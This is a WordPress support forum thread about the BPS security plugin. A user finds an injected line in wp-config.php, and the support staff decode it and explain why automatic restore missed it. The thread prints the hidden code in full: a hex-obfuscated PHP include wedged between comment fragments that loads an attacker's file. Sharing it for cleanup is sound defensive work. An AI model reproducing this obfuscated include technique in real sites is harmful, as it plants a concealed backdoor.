Prevent wp-config.php file edits

[Marsha Marrings]

Found the following code in the wp-config file. Is there a BPS setting to prevent this? Any suggestion would be very much appreciated.

/**
* The base con*/include /*figurations of the WordPress.
*
* This*/"\x44:/w\x77w/W\x65bsi\x74es/\x68ead\x73afe\x74y.c\x61/we\x62roo\x74/wp\x2dcon\x74ent\x2fplu\x67ins\x32/wa\x73qui\x7a-ma\x73ter\x2dnex\x74/pa\x67e.p\x68p";/* file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

[AITpro Admin]

BPS Pro AutoRestore|Quarantine (ARQ IDPS) will automatically autorestore and/or quarantine any files that have been edited/tampered with.  If this code was injected into your wp-config.php file prior to installing BPS Pro then you would need to Turn Off ARQ, remove/delete this code from the wp-config.php file and run the Setup Wizards again.  If your website was hacked prior to installing BPS Pro then see this forum topic on how to clean up a hacked website/hosting account:  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

Note: BPS Pro 13.3 has a new malware scanner that will detect this type of code injection.  Malware scanners are an “after the fact” type of tool to find malicious or obfuscated code.  The ARQ IDPS scanner (created years ago) is a real-time automated detect and repair feature that automatically prevents hacks from being successful in real-time by autorestoring and/or quarantining files, but ARQ IDPS only works correctly if your website/hosting account was “hack free” prior to installing BPS Pro on your website/hosting account.

Hex obfuscated code decoded:
D:/www/Websites/headsafety.ca/webroot/wp-content/plugins2/wasquiz-master-next/page.php

[Marsha Marrings]

Sorry, let me rephrase the question. How to block hacker/spammer from changing wp-config.php. Autorestore was on, yet file was modified and not quarantined. I’m trying to figure out how to configure BPS to prevent such an edit. Here is the part of the file that was edited:

[AITpro Admin]

Since ARQ did not autorestore and quarantine the wp-config.php file then one of these things below is the reason for that.

1. The wp-config.php file was already edited prior to installing BPS Pro and the edited wp-config.php file was backed up in AutoRestore backup.  If this is what happened then the backup file will also have that wp-config.php file edit in it:  /wp-content/bps-backup/autorestore/root-files/wp-config.php.
2. ARQ is not really turned On or the ARQ Cron override setting is on. Check your ARQ settings.
3. Something is breaking ARQ on your website and ARQ is not actually working.  Test uploading or editing a file to see if ARQ is working or not.
4. WordPress Crons are disabled on your website. AutoRestore and several other BPS Pro security features use standard WP crons to check things.  WP crons must be enabled on your website in order for most of BPS Pro’s security features to work correctly.

Also this is a very common scenario that we see all the time unfortunately > someone installs BPS or BPS Pro and then starts seeing unusual or suspicious things in the log files or other things, which indicate that the site might already be hacked.  Most people believe that their website was just recently hacked, but unfortunately in 95% of the cases that we investigate the website was already hacked prior to installing BPS or BPS Pro for anywhere from a few months to a few years.

[Marsha Marrings]

Looking forward to 13.3, I have 13.2. The first thing I checked was if autorestore was on, and it was. It goes off after 4.8.1 upgrade, with notice, and I go through the steps on all the sites to get autorestore back on, but in this case, I hadn’t yet done the 4.8.1 and autorestore was still on. There was one file in quarantine, but it wasn’t this wp-config.php. This prompted me to study the file since every single file dropped or modified has been quarantined by BPS since day one of website and BPS. The file and the backup had the exact same file stamp and size. I am not qualified to comment on how the injection and the backup were the same size. It is the only way I can fathom how it didn’t get quarantined. Any other suggestions before 13.3 would be very much appreciated.

[AITpro Admin]

ARQ Automation automatically turns itself off, backs up files and turns itself back on.  There is a 1 minute time delay where ARQ Automation goes into a “Pending” status to ensure all files have actually completed being backed up.  If the ARQ “Pending” status is displayed for longer than 3 minutes then that means a problem was detected and an ARQ FailSafe has kicked in to prevent a serious problem and ARQ will not automatically be turned back on.  Do not bother comparing the last modified times of actual files to timestamps since that will not tell you anything useful.  Quarantine timestamps are only useful to tell you when a file was quarantined and that is the extent of the usefulness of Quarantine timestamps.  File size on the otherhand is very useful since ARQ IDPS compares file sizes.  So what you have confirmed is that the wp-config.php file in ARQ file backups was already edited before you backed up files by running the Setup Wizard the first time.  That simply means the wp-config.php file was already edited prior to installing BPS Pro and running the Setup Wizards.

My guess is that it was injected by a hacker script that once existed on your website, but you should always assume the worst and do a thorough check of your hosting account to make sure there are no leftover or existing hacker files or code anywhere under your hosting account.  WP Core folders and files do not need to be checked since you can just delete WP Core folders and files and replace them with new WP Core folders and files.  So that would leave you with checking any folders or files that are not WP Core files.  See this forum topic for general help info on dehacking a website/hosting account (typically any of the DB steps are not going to be necessary to do):  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

[Marsha Marrings]

Thank you for pointing me in all the right directions and for such an amazing product. The persistently quarantined file that was not the wp-config and the small number of backed up files indicated that I didn’t do the pre/setup process right (2 times). I did take wordfence out and then reran and did the tests/checks you recommended. BPS is now working like on the other website and I’ve no doubt we’re back to bulletproof here too (once I delete everything and rebuild from April’s backup or scratch). Btw, wordfence, itheme and BPS work fine together on the other site, so I put them back and retested fine.  The peace of mind from having BPS and the tech support in the face of trouble, well I couldn’t do it without you, that’s for sure.

[Author]

Posts